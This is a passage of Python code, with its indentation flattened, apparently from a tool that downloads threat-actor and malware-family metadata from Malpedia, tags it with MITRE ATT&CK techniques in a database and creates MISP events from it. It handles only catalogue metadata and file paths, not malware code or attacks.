for tag in mitre_tag:
iGalaxy = tag["galaxy"]
iTag = tag["tag"]
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT GALAXY: {} TAG: {}".format(iGalaxy, iTag))
altActorTechniqueIDs = mf.get_group_technique_ids(value)
for tID in altActorTechniqueIDs:
retTags = db.get_galaxy_specific_tags(tID)
# INSERT NEWLY DISCOVERED TAGS INTO DATABASE
for sub in retTags:
if sub["uuid"] not in altActorTechniqueTags:
altActorTechniqueTags.add(sub["uuid"])
iGalaxy = sub["galaxy"]
iTag = sub["tag"]
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
if gv._DEBUG:
print("f(x) build_actor_malware_tree: CORRELATING TAG FROM ALT NAME: {} GALAXY: {} TAG: {}".format(value, iGalaxy, iTag))
else:
if gv._DEBUG:
print("f(x) build_actor_malware_tree: DUPLICATE GROUP CODE SKIPPED")
# VICTIMS
for value in gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST:
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR VICTIMS: {}".format(value))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "VICTIMS")
# TARGETS
for value in gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST:
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: TARGET: {}".format(value))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "TARGETS")
db.insert_actor(gv._CURRENT_ACTOR_UUID_STR, \
threat_actor, \
gv._CURRENT_ACTOR_NAME_STR, \
gv._CURRENT_ACTOR_META_COUNTRY_STR, \
gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR, \
gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR, \
gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR, \
gv._CURRENT_ACTOR_META_SINCE_STR, \
gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR, \
gv._CURRENT_ACTOR_META_CAPABILITIES_STR, \
lastupdated, \
gv._CURRENT_ACTOR_DESCRIPTION_STR )
# ---------------------------------------------------------------------
# ACTOR_CFRSUSPECTEDVICTIMS
for victim in gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST:
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: VICTIM: VICTIM: {}".format(victim))
db.insert_victims(gv._CURRENT_ACTOR_UUID_STR, victim)
# ---------------------------------------------------------------------
# REFERENCES
for reference in gv._CURRENT_ACTOR_META_REFS_LIST:
if gv._DEBUG:
print ("f(x) build_actor_malware_tree: INSERT REFERENCE: {}".format(reference))
db.insert_reference(gv._CURRENT_ACTOR_UUID_STR, reference)
# ---------------------------------------------------------------------
# ACTOR_CFRTARGETCATEGORY
for targetcategory in gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST:
if gv._DEBUG:
print ("f(x) build_actor_malware_tree: INSERT TARGET CATEGORY: {}".format(targetcategory))
db.insert_target(gv._CURRENT_ACTOR_UUID_STR,targetcategory)
# ---------------------------------------------------------------------
# ACTOR SYNONYMS
for synonym in gv._CURRENT_ACTOR_META_SYNONYMS_LIST:
if gv._DEBUG:
print ("f(x) build_actor_malware_tree: INSERT ACTOR SYNONYM: {}".format(synonym))
db.insert_synonym(gv._CURRENT_ACTOR_UUID_STR, synonym, "ACTOR")
# ---------------------------------------------------------------------
# END ACTOR META DATA DB INSERT
# ---------------------------------------------------------------------
db.insert_parent_child(gv._CURRENT_ACTOR_UUID_STR, \
"", \
threat_actor,
"", \
False, \
"", \
"", \
"", \
"ACTOR", \
"NONE")
def stageActorMalwareMeta():
# BEGIN DOWNLOADING ALL ACTORS
print("f(x) stageActorMalwareMeta: GETTING A LIST OF THREAT ACTORS FROM MALPEDIA")
mpClient = Authenticate()
gv._ACTORS_LIST = mpClient.list_actors()
print("f(x) stageActorMalwareMeta: RETRIEVED LIST OF THREAT ACTORS FROM MALPEDIA")
# WRITE OUT OUTPUT
with open(gv._MALPEDIA_OUTPUT + "actors/" + "001.actors.json", 'w') as jsonOut:
jsonOut.write(json.dumps(gv._ACTORS_LIST))
jsonOut.close()
#BEGIN ACTOR/MALWARE METADATA SECTION
try:
# DOWNLOAD ACTOR PROFILES AND WRITE THEM TO JSON
# THROTTLE SO IT DOESN'T LOCK API KEY
max_requests_per_minute = 40 #60 requests per minute is the max
current_request_count = 1
completed_actors_list = []
# MAKE THE COMPLETED FILE IF IT DOESN'T EXIST
completed_actors_file_path = gv._MALPEDIA_OUTPUT + "actors/" + "001.completed.actors.json"
if os.path.isfile(completed_actors_file_path):
with open(completed_actors_file_path, 'r') as jsonIn:
completed_actors_list = json.loads(fix_json(jsonIn.read()))
jsonIn.close()
else:
with open(completed_actors_file_path, 'w') as jsonOut:
jsonOut.write(json.dumps(" "))
jsonOut.close
tStart = time.time()
tNow = None
tDiff = 0
iWait = 140
for actor_id in gv._ACTORS_LIST:
if actor_id in completed_actors_list:
continue
with open(gv._MALPEDIA_OUTPUT + "actors/" + actor_id + ".json", 'w') as jsonOut:
print("f(x) stageActorMalwareMeta: PULLING DATA FOR ACTOR: {}".format(actor_id))
mpClient = Authenticate()
gv._CURRENT_ACTOR_INFO_DICT = mpClient.get_actor(actor_id)
jsonOut.write(json.dumps(gv._CURRENT_ACTOR_INFO_DICT))
jsonOut.close()
tNow = time.time()
tDiff = tNow - tStart
if ((current_request_count == max_requests_per_minute) and (tDiff <= iWait )):
tNow = time.time()
tDiff = tNow - tStart
print("f(x) stageActorMalwareMeta: API PULL THRESHHOLD REACHED.")
while (tDiff <= iWait):
time.sleep(1)
tNow = time.time()
tDiff = (tNow - tStart)
print("f(x) stageActorMalwareMeta: WAITING {} SECONDS.".format(math.ceil(iWait - tDiff)))
tStart = time.time()
current_request_count = 1
print("f(x) stageActorMalwareMeta: RESUMING PULLS")
else:
completed_actors_list.append(actor_id)
completed_actors_file = open(completed_actors_file_path, 'w')
completed_actors_file.write(json.dumps(completed_actors_list))
completed_actors_file.close
current_request_count += 1
# DEBUG SEQ
if gv._DEBUG:
print("f(x) stageActorMalwareMeta: {}: ADDED TO COMPLETED ACTORS.".format(actor_id))
# os.remove(completed_actors_file_path)
print("f(x) stageActorMalwareMeta: COMPLETED DOWNLOAD OF ACTOR META INFO")
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) stageActorMalwareMeta ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def initGlobals():
if os.getenv('MISP_KEY') and os.getenv("MISP_URL") and os.getenv("MALPEDIA_KEY"):
gv._MISP_KEY = os.getenv('MISP_KEY').replace("\'", "").replace("\"", "")
gv._MISP_URL = os.getenv('MISP_URL').replace("\'", "").replace("\"", "")
gv._MALPEDIA_KEY = os.getenv('MALPEDIA_KEY').replace("\'", "").replace("\"", "")
print("f(x) initGlobals: KEYS SET:\n\tMISP KEY: {}\n\tMISP URL: {}\n\tMALPEDIA KEY: {}".format(gv._MISP_KEY, gv._MISP_URL, gv._MALPEDIA_KEY))
else:
print("f(x) initGlobals: INVALID MISP_KEY, MISP_URL, AND/OR MALPEDIA KEY. EXITING")
return(1)
print("f(x) initGlobals: TESTING CONNECTIVITY TO MISP:", end=' ')
try:
# retVal = 0
mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
result = mispDB.get_user()
if result:
print("PASSED")
except Exception as e:
print ("FAILED")
return(1)
print("f(x) initGlobals: TESTING CONNECTIVITY TO MALPEDIA:", end=' ')
try:
mpClient = Authenticate()
result = mpClient.list_samples("win.sslmm")
if result:
print("PASSED")
except Exception as e:
print ("FAILED")
return(1)
# ADD MANUAL TAGS
print("f(x) initGlobals: INSERTING MANUAL TAGS")
db.insert_manual_tags()
# # PULL LATEST MISP GALAXIES
# print("f(x) initGlobals: CLONING MISP GALAXY REPO")
# if os.path.exists(gv._MISP_GALAXY_GIT):
# print("f(x) initGlobals: FOUND OLD MISP GALAXY DIRECTORY. SKIPPING")
# #shutil.rmtree(gv._MISP_GALAXY_GIT)
# else:
# git_actions.clone_misp_galaxy()
# print("f(x) initGlobals: CLONED MISP GALAXY REPO")
# PULL LATEST MALPEDIA
# print("f(x) initGlobals: PULLING MALPEDIA GITHUB")
# git_actions.pull_malpedia_git()
# print("f(x) initGlobals: PULLED MALPEDIA GITHUB")
# # CLONE MITRE REPO
# print("f(x) initGlobals: CLONING MITRE REPO")
# if os.path.exists(gv._MITRE_GIT):
# print("f(x) initGlobals: FOUND OLD MITRE DIRECTORY. SKIPPING")
# #shutil.rmtree(gv._MISP_GALAXY_GIT)
# else:
# git_actions.clone_mitre_git()
# print("f(x) initGlobals: CLONED MITRE REPO")
# LOAD MITRE SOFTWARE
print("f(x) initGlobals: LOADING MITRE SOFTWARE ALIASES INTO DB")
mf.load_mitre_software()
print("f(x) initGlobals: LOADED MITRE SOFTWARE ALIASES INTO DB")
# CREATE OUTPUT DIRECTORIES IF THEY DON'T EXIST
if not os.path.exists(gv._MALPEDIA_OUTPUT):
os.makedirs(gv._MALPEDIA_OUTPUT)
if not os.path.exists(gv._MALPEDIA_OUTPUT + "actors"):
os.makedirs(gv._MALPEDIA_OUTPUT + "actors")
if not os.path.exists(gv._MALPEDIA_OUTPUT + "malware"):
os.makedirs(gv._MALPEDIA_OUTPUT + "malware")
# GET NAME OF MALWARE FAMILIES FROM DIRECTORY LISTING
for name in glob.glob(gv._MALPEDIA_REPOSITORY + "**", recursive=True):
if "yara" not in name and ".json" not in name:
gv._DIR_MALPEDIA_GIT_LIST.append(name)
gv._DIR_MALPEDIA_GIT_LIST.sort()
if gv._DEBUG:
print(*gv._DIR_MALPEDIA_GIT_LIST, sep = "\n")
print("f(x) initGlobals: STAGED ENVIRONMENT")
def stageThreatActors():
for actor in gv._ACTORS_LIST:
if gv._DEBUG:
print("INGESTING ACTOR INTO DATABASE: {}".format(actor))
build_actor_malware_tree(actor)
def removeDuplicates(iUUID, x, lenList):
try:
countUUID = mef.uuidSearch(iUUID)
if countUUID == 0:
print("f(x) removeDuplicates: FOUND UNIQUE UUID {}/{}: {}".format(x, lenList, iUUID))
gv._UUIDS.append(iUUID)
else:
print("f(x) removeDuplicates: REMOVED DUPLICATE UUID {}/{}: {}".format(x, lenList, iUUID))
return True
except Exception as e:
print("f(x) removeDuplicates: ERROR: {}".format(e))
sys.exit(e)
def pushNewEventsIntoMisp(iUUIDS, update=False):
try:
gv._UUIDS = []
oUUIDs = []
# ATTEMPT TO TRIM DOWN LIST IF THIS IS NOT AN UPDATE EVENT
x = 0
lenIUUIDS = len(iUUIDS)
if update == False:
print("f(x) pushNewEventsIntoMisp: CHECKING AND REMOVING DUPLICATES.")
for oUUID in iUUIDS:
x += 1
# removeDuplicates(oUUID["uuid"])
gv._THREAD_LIST.append(executor.submit(removeDuplicates, oUUID["uuid"], x, lenIUUIDS))
# print("f(x) pushNewEventsIntoMisp {}/{}: CHECKING: {}".format(x , lenIUUIDS, oUUID["uuid"]))
oUUIDs = gv._UUIDS
else:
x = 0
for oUUID in iUUIDS:
x += 1
gv._UUIDS.append(oUUID["uuid"])
print("f(x) pushNewEventsIntoMisp: UNIQUE UUID ADDED {}/{}: {}".format(x, x, oUUID["uuid"]))
cf.wait(gv._THREAD_LIST)
gv._THREAD_LIST = []
oUUIDs = gv._UUIDS
gv._UUIDS = []
x = 0
lengvUUIDS = len(oUUIDs)
print("f(x) pushNewEventsIntoMisp: PROCESSING {} EVENTS".format(lengvUUIDS))
for oUUID in oUUIDs:
x += 1
# HAVE TO GET COUNT IN CASE THIS IS AN UPDATE EVENT TO DETERMINE IF YOU NEED TO UPDATE OR INSERT
countUUID = mef.uuidSearch(oUUID)
# UUID NOT FOUND SO CREATE IT
if countUUID == 0:
if gv._DEBUG:
print("f(x) pushNewEventsIntoMisp {}/{}: CREATING MISP EVENT FOR UUID: {}".format(x, lengvUUIDS, oUUID))
# CREATE A MISP EVENT
mef.createIncident(oUUID, False)
# threads.append(eventThread)
# UUID IS FOUND SO SKIP IT SINCE THIS IS THE FIRST RUN
else:
if update == True:
if gv._DEBUG:
print("f(x) pushNewEventsIntoMisp {}/{}: UPDATING MISP EVENT FOR UUID: {}".format(x, lengvUUIDS, oUUID))
mef.createIncident(oUUID, True)
else:
print("f(x) pushNewEventsIntoMisp {}/{}: DUPLICATE EVENT DETECTED. UUID: {}".format(x, lengvUUIDS,oUUID))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) pushNewEventsIntoMisp: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def stageUnattributedActor():
try:
# CREATE UNATTRIBUTED ACTOR
myName = "UNATTRIBUTED"
if gv._DEBUG:
print("f(x) stageUnattributedActor: INITIALIZING DATA FOR: {}".format(myName))
myUUID = str(uuid.uuid4())
parentUUID = ""
myType = "ACTOR"
parentName = "NONE"
myPath = ""
myVersion = ""
myDate = ""
parentType = "NONE"
db.insert_actor(myUUID, "UNATTRIBUTED", "UNATTRIBUTED", "", "", "", "","","","",datetime.date.today(),"UNATTRIBUTED")
db.insert_parent_child(myUUID, parentUUID, myName, parentName, 0, myPath, myVersion, myDate, myType, parentType)
# CREATE ERROR ACTOR
myName = "ERROR"
if gv._DEBUG:
print("f(x) stageUnattributedActor: INITIALIZING DATA FOR: {}".format(myName))
myUUID = str(uuid.uuid4())
parentUUID = ""
myType = "ACTOR"
parentName = "NONE"
myPath = ""
myVersion = ""
myDate = ""
parentType = "NONE"
db.insert_actor(myUUID, "ERROR", "ERROR", "", "", "", "","","","",datetime.date.today(),"ERROR")
db.insert_parent_child(myUUID, parentUUID, myName, parentName, 0, myPath, myVersion, myDate, myType, parentType)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) stageUnattributedActor: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def stageMalwareFamilies():
try:
malwareFamilySet = set()
checkedSet = set()
# GO THROUGH PATH
for path in gv._DIR_MALPEDIA_GIT_LIST:
lstPath = path.split("/")
pathLen = len(lstPath)
# LEVEL OF THE SHORT NAMES OF MALWARE
currDirDepth = gv._CURRENT_DIR_DEPTH
if pathLen > currDirDepth:
myName = lstPath[currDirDepth-1]
if myName not in malwareFamilySet and myName not in checkedSet:
checkedSet.add(myName)
stored_data = db.get_parent_child_data(iValue=myName)
# IF NONE, WE DONT HAVE THIS FAMILY
if not stored_data:
malwareFamilySet.add(myName)
if gv._DEBUG:
print("f(x) stageMalwareFamilies(): FOUND FAMILY IN PATH: {}".format(myName))
for family in malwareFamilySet:
print("f(x) stageMalwareFamilies(): STAGING DATA FOR FAMILY: {}".format(family))
insertFamilyIntoDB(family)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) stageMalwareFamilies(): {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def getFamilyInformation(iFamilyName):
try:
# GET THE FAMILY JSON FILE
malware_family_json = gv._MALPEDIA_REPOSITORY + iFamilyName + "/" + iFamilyName + ".json"
isFile = os.path.isfile(malware_family_json)
if gv._DEBUG:
print("f(x) getFamilyInformation(): GETTING FAMILY INFORMATION FOR:\nFAMILY: {}\nPATH: {}".format(iFamilyName, malware_family_json))
if isFile:
with open(malware_family_json, 'r') as jsonIn:
# # IN ORDER TO 'FIX' ERRONEOUSLY FORMATTED JSON, YOU HAVE TO FIRST IMPORT THE FILE INTO YAML, THEN INTO JSON
# yamlData = yaml.safe_load(jsonIn)
# jsonData = json.dumps(yamlData)
# fix_json(jsonIn)
if gv._DEBUG:
print("f(x) getFamilyInformation() JSON DATA: {}".format(jsonIn))
malware_family_data = json.loads(fix_json(jsonIn))
jsonIn.close()
else:
return "NONE"
return malware_family_data
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) getFamilyInformation ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def insertFamilyIntoDB(iFamilyName):
threat_actor = ""
threat_actor_UUID = ""
try:
malwareFamilyDict = getFamilyInformation(iFamilyName)
malwareFamilyMitreSoftwareTags = []
malwareFamilyMitreSoftwareTechniqueTags = []
malwareFamilyAltNamesMitreSpecificTags = []
actor_data = ""
# STRING OF COMMON NAME OF THIS MALWARE FAMILY
try:
commonName = malwareFamilyDict["common_name"].strip()
print("f(x) insertFamilyIntoDB: IMPORTING MALWARE: {}".format(commonName.upper()))
except:
commonName = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY COMMON NAME: {}".format(commonName))
# LIST OF THE ALT NAMES ASSOCIATED WITH THIS MALWARE FAMILY
try:
altNames = malwareFamilyDict["alt_names"]
except:
altNames = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY ALT NAMES:")
print(*altNames, sep = "\n")
# STRING OF ATTRIBUTION OF THIS MALWARE FAMILY
try:
attribution = malwareFamilyDict["attribution"]
except:
attribution = []
# IF NO ATTRIBUTION SET IT TO BE ATTRIBUTED TO BE UNATTRIBUTED
if len(attribution) == 0:
attribution = ["UNATTRIBUTED"]
threat_actor = "UNATTRIBUTED"
for attributed in attribution:
actor_data = db.get_actor_meta(iCommonName=attributed)
# ONLY GET THE FIRST ONE
try:
threat_actor = actor_data["shortname"]
threat_actor_UUID = actor_data["uuid"]
except:
actor_data = db.get_actor_meta(iCommonName="ERROR")
threat_actor = actor_data["shortname"]
threat_actor_UUID = actor_data["uuid"]
finally:
break
if gv._DEBUG:
print("f(x) stageMalwareFamilies(): LOOKING FOR THREAT ACTOR: [{}]: UUID: [{}]".format(threat_actor, threat_actor_UUID))
# STRING OF DESCRIPTION OF THIS MALWARE FAMILY
try:
malwareDescription = malwareFamilyDict["description"].strip()
except:
malwareDescription = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY DESCRIPTION: {}".format(malwareDescription))
#STRING OF UUID OF CURRENT MALWARE FAMILY
try:
malwareUUID = malwareFamilyDict["uuid"].strip()
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) insertFamilyIntoDB: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
malwareUUID = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY UUID: {}".format(malwareUUID))
# STRING OF WHEN THIS FAMILY WAS LAST UPDATED
try:
malwareUpdated = malwareFamilyDict["updated"].strip()
except:
malwareUpdated = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY LAST UPDATED: {}".format(malwareUpdated))
# BUILD YARA PATH DICT [gv._CURRENT_ACTOR_FAMILIES_CURRENT_FAMILY_YARA_DICT]
malwareYaraDict = {}
try:
for name in set(glob.glob(gv._MALPEDIA_REPOSITORY + "/" + iFamilyName + "/yara/tlp_*/*")):
tlp = name.split("/")[gv._TLP_SPLIT_DEPTH]
malwareyarapath = name
malwareYaraDict[malwareyarapath] = tlp
except Error as e:
malwareYaraDict = {}
#DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY TLP AND YARA FILES")
print(json.dumps(malwareYaraDict, indent=4))
# LIST OF THE URLS ASSOCIATED WITH THIS MALWARE FAMILY
try:
malwareURLs = malwareFamilyDict["urls"]
except:
malwareURLs = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: FAMILY URLS")
print(*malwareURLs, sep = "\n")
# ---------------------------------------------------------------------
# BEGIN INSERT MALWARE METADATA INTO DB
# ---------------------------------------------------------------------
# TAGS FOR MALWARE
# ---------------------------------------------------------------------
# ATTRIBUTION
threat_actor_all_syn = db.get_synonyms(threat_actor_UUID)
threat_actor_set = set()
for synonym in threat_actor_all_syn:
threat_actor_set.add(synonym["synonym"])
for value in threat_actor_set:
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: INSERT TAG: ACTOR: ACTOR SYNONYMS: {}".format(value))
db.insert_tag(malwareUUID, "", value, "ACTOR")
# ACTOR FAMILY RELATIONSHIP (PARENT AND CHILD UUIDS)
db.insert_parent_child(malwareUUID, threat_actor_UUID, iFamilyName, threat_actor, False, "", "", "", "FAMILY", "ACTOR")
# MALWARE META
db.insert_malware_meta( malwareUUID, iFamilyName, commonName, malwareDescription, malwareUpdated)
# MALWARE ATTRIBUTION
for attributed in attribution:
db.insert_malware_attribution(malwareUUID, attributed)
# MALWARE SYNONYMS
for altname in altNames:
db.insert_synonym(malwareUUID, altname, "MALWARE")
# MALWARE REFERENCES
for url in malwareURLs:
db.insert_reference(malwareUUID, url)
# DEBUG SEQ
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: {}: {}".format(malwareUUID, url))
# MALWARE YARA PATH
for key, value in malwareYaraDict.items():
myUUID = str(uuid.uuid4())
db.insert_malware_yara(malwareUUID, value, key, myUUID)
# MALWARE TAGS
db.insert_tag(malwareUUID, "", iFamilyName, "MALWARE")
# db.insert_tag(threat_actor_UUID, "", iFamilyName, "MALWARE")
# MALPEDIA TAGS
db.insert_tag(malwareUUID, "Malpedia", commonName, "GALAXY", iFamilyName)
# db.insert_tag(threat_actor_UUID, "Malpedia", commonName, "GALAXY", iFamilyName)
# COMMON NAME OF MALWARE
db.insert_tag(malwareUUID, "", commonName, "MALWARE")
# db.insert_tag(threat_actor_UUID, "", commonName, "MALWARE")
# COMMON NAME OF THIS THREAT ACTOR
db.insert_tag(malwareUUID, "", gv._CURRENT_ACTOR_NAME_STR, "ACTOR")
# SHORT NAME OF THIS THREAT ACTOR
db.insert_tag(malwareUUID, "", threat_actor, "ACTOR")
# MITRE
# ----------------------------------------------------------------------------------
# GET S CODE FROM COMMON NAME IN MITRE TABLE FOR SOFTWARE
software_codes = []
try:
software_codes = db.get_mitre_software_code(commonName)
except:
software_codes = []
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: RETRIEVED MALWARE CODE FOR: {}".format(commonName))
if software_codes:
iMitreSCode = software_codes[0]["mitrecode"]
mitre_tag = []
if len(malwareFamilyMitreSoftwareTags) == 0:
try:
malwareFamilyMitreSoftwareTags = db.get_galaxy_specific_tags(iMitreSCode, "malware")
except:
malwareFamilyMitreSoftwareTags = []
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TAGS FOR: {}".format(commonName))
# GET/ INSERT SOFTWARE CAPABILIIES/TECHNIQUES FROM COMMON NAME OF SOFTWARE
technique_list = []
try:
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: GETTING MITRE MALWARE TECHNIQUE IDS")
technique_list = mf.get_software_technique_ids_from_software_name(commonName)
except:
technique_list = []
for technique in technique_list:
malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(technique))
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TECHNIQUE TAGS FOR: {}".format(commonName))
# TLP TAGS
db.insert_tag(malwareUUID, "", "tlp:amber", "MALWARE")
malwareFamilyAltNamesMitreSpecificTags.clear()
altCount = 0
# ALT NAMES FOR THIS FAMILY OF MALWARE
for value in altNames:
altCount += 1
db.insert_tag(malwareUUID, "", value, "MALWARE")
# db.insert_tag(threat_actor_UUID, "", value, "MALWARE")
# GET S CODE FROM ALIASES MITRE TABLE FOR SOFTWARE
software_codes = []
try:
software_codes = db.get_mitre_software_code(value)
except:
software_codes = []
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: RETRIEVED SOFTWARE CODES FOR: [{}]: {}".format(altCount, value))
if software_codes:
iMitreSCode = software_codes[0]["mitrecode"]
mitre_tag = []
try:
mitre_tag = db.get_galaxy_specific_tags(iMitreSCode, "malware")
except:
mitre_tag = []
for tags in mitre_tag:
malwareFamilyAltNamesMitreSpecificTags.append(tags)
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: RETRIEVED SOFTWARE TAGS FOR: {}".format(value))
knownTags = False
j = 0
mergeList = []
for value in malwareFamilyAltNamesMitreSpecificTags:
j += 1
b = 0
for tag in malwareFamilyMitreSoftwareTags:
b += 1
iTag = tag["tag"]
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: COMPARING:[{}][{}] {}:{}".format(j, b, iTag, value["tag"]))
if value["tag"] == iTag:
knownTags = True
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: TAGS ALREADY KNOWN FOR: [{}]:{}".format(altCount, value["tag"]))
break
else:
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: UNKNOWN TAG: [{}]:{}".format(altCount, value["tag"]))
mergeList.append(tag)
if knownTags == False:
malwareFamilyMitreSoftwareTags += mergeList
malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(iMitreSCode, "malware"))
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: ADDING NEW DATA TAG: [{}]:{}".format(altCount, value))
# GET/ INSERT SOFTWARE CAPABILIIES/TECHNIQUES FROM ALT NAMES OF SOFTWARE
technique_list = []
try:
technique_list = mf.get_software_technique_ids_from_software_name(value)
except:
technique_list = []
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: RETRIEVED TECHNIQUE IDS FOR: {}".format(value))
for technique in technique_list:
malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(technique))
if gv._DEBUG:
print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TECHNIQUE TAGS FOR: {}".format(value))
# ADD THE MITRE TAGS
for tag in malwareFamilyMitreSoftwareTechniqueTags:
for var in tag:
iGalaxy = var["galaxy"]
iTag = var["tag"]
db.insert_tag(malwareUUID, iGalaxy, iTag, "GALAXY")
db.insert_tag(threat_actor_UUID, iGalaxy, iTag, "GALAXY")
# MITRE SOFTWARE ID
mitre_tag = malwareFamilyMitreSoftwareTags
# INSERT TAG WITH mitre-malware or GALAXY AS SOURCE
for tag in mitre_tag:
iGalaxy = tag["galaxy"]
iTag = tag["tag"]
db.insert_tag(malwareUUID, iGalaxy, iTag, "GALAXY")
db.insert_tag(threat_actor_UUID, iGalaxy, iTag, "GALAXY")
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) insertFamilyIntoDB: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# INSERT FAMILY SPECIFIC PATHS AND FILES IN DATABASE
def stagePathsAndFiles(iFamilyName=""):
if gv._DEBUG:
print("f(x) stagePathsAndFiles: ANALYZING MALWARE ON DISK")
parentUUID = None
searchDir = sorted(glob.glob(gv._MALPEDIA_REPOSITORY + iFamilyName + "/**/*", recursive=True))
for path in searchDir:
# WE DON'T WANT YARA OR JSON FILES
if "yara" in path or ".json" in path:
continue
try:
pathLen = len(path.split("/"))
lstPath = path.split("/")
currDirDepth = gv._CURRENT_DIR_DEPTH
parentName = iFamilyName
while currDirDepth < pathLen:
if gv._DEBUG:
print("f(x) stagePathsAndFiles: ANALYZING PATH: {}".format(path))
myName = lstPath[currDirDepth]
stored_data = db.get_parent_child_data( iValue=myName)
myUUID = ""
myType = ""
myPath = "/"
myPath = myPath.join(lstPath[0:currDirDepth+1])
isFile = os.path.isfile(myPath)
parentLookup = False
# MALWARE FAMILY COMMON NAME AND UUID
malwareFamilyMeta = db.get_family_meta(iName=iFamilyName)
malwareFamilyUUID = malwareFamilyMeta["uuid"]
if gv._DEBUG:
print("f(x) stagePathsAndFiles: ANALYZING: {}".format(myName))
if not stored_data:
myUUID = str(uuid.uuid4())
parentLookup = True
else:
stored_path = stored_data["path"]
# IN CASE SAME FILE IS UPLOADED TO MULTIPLE PLACES
if stored_path == myPath:
myUUID = stored_data["uuid"]
myType = stored_data["mytype"]
parentUUID = stored_data["parentuuid"]
parentName = stored_data["parentname"]
else:
myUUID = str(uuid.uuid4())
parentLookup = True
myStatus = ""
myVersion = ""
myDate = ""
parentType = ""
if parentLookup == True:
parent_info = db.get_parent_child_data( iValue=parentName)
if parent_info:
parentUUID = parent_info["uuid"]
parentName = parent_info["name"]
if gv._DEBUG:
print("f(x) stagePathsAndFiles: PARENT FOUND: {}".format(parentName))
if currDirDepth == gv._CURRENT_DIR_DEPTH:
parentType = "FAMILY"
if not isFile:
myType = "PATH"
else:
myType = "MALWARE"
else:
parentType= "PATH"
if not isFile:
myType = "PATH"
else:
myType = "MALWARE"
if gv._DEBUG:
print("f(x) stagePathsAndFiles: INSERTING PARENT CHILD DATA FOR: {}".format(myName))
# INSERT PARENT CHILD RELATIONSHIP WITH META DATA
db.insert_parent_child( myUUID, \
parentUUID, \
myName, \
parentName, \
isFile, \
myPath, \
myVersion, \
myDate, \
myType, \
parentType
)
# ADD ALL TAGS FROM MALWARE FAMILY TO PATH AND SPECIMEN
mitre_tags_for_self = db.copy_tags(iSourceUUID=malwareFamilyUUID, iDestinationUUID=myUUID)
db.insert_tag(iIsList=True, iList=mitre_tags_for_self)
# INSERT TAG WITH mitre-malware or GALAXY AS SOURCE
if gv._DEBUG:
